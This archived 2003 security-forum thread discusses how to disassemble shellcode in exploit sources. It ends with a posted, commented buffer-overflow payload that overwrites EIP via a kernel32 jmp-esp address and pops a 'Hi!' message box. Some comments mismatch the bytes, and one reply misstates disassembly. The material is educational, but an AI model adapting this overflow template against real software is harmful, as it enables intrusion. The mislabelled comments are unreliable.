Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Programming / Tool Design
lmg
Oct 27 2003, 10:22 AM
Hi,

Let suppose I find an exploit code source on the net. This exploit is often a C source code with some 0xXX code inside. How could I disassemble the shellcode to be able to understand what it does ?
Should I compile the exploit and then disassemble the whole exe, or is there a way to just disassemble the 0xXX damn symbols ? huh.gif
lmg
Oct 28 2003, 08:15 AM
Sorry but converting asm to hex is assembly. Disassembly is converting from hex to asm. That's what I'm looking for...
coder
Oct 27 2003, 03:49 PM
Those symbols you speak of are Hexidecimal values (the "\x" signifies that the following value is in hex) Basically the shellcode has already been disassembled (that's why it's in hex) .
ComSec
Oct 27 2003, 10:30 AM
moved to programming forum
LiquidIce
Nov 14 2003, 05:12 PM
pe explorer does this ?
coder
Nov 14 2003, 05:35 PM
here is an example of such shell code (and it's corresponding ASM);
CODE

#Example ShellCode
("user ",0);
   
("\x90"x485,0);         #485 nops to overwrite EIP
("\xab\xa3\x54\x77",0);    #Overwriting EIP with "jmp,esp" address via Kernel32.dll
("\x90"x5,0);       #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
   
("\x55",0);      #push ebp - starting something new
("\x8b\xec",0);     #mov ebp,esp
("\x33\xff",0);     #xor edi,edi - edi = 0
("\x57",0);      #push edi
       
("\xc6\x45\xfc\x48",0);   #mov byte ptr [ebp-0x4],0x6f - H
("\xc6\x45\xfd\x69",0);   #mov byte ptr [ebp-0x3],0x78 - i
("\xc6\x45\xfe\x21",0);   #mov byte ptr [ebp-0x2],0x21 - !
   
   
("\xba\xd5\x75\xe3\x77",0);  #mov edx, 0x77e375d5 - MessageBoxA to edx
("\x52",0);      #push edx
("\x57",0);      #push edi
("\x8d\x55\xfc",0);    #lea edx,[ebp-0x4] - move Hi! to edx
("\x52",0);      #push edx
("\x52",0);      #push edx
("\x52",0);      #push edx
 
("\x57",0);      #push edi
("\xff\x55\xf8",0);    #call dword ptr [ebp-0x8]
("\x55",0);      #push ebp - Start the exit stuff so we don't crash
("\x8b\xec",0);     #move ebp,esp
("\xba\x86\x41\x01\x89",0);  #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
("\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null
("\x52",0);      #push edx
("\x33\xc0",0);     #xor eax,eax
("\x50",0);      #push eax
("\xff\x55\xfc",0);    #call dword ptr [ebp-0x4]
   
("\n",0);
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.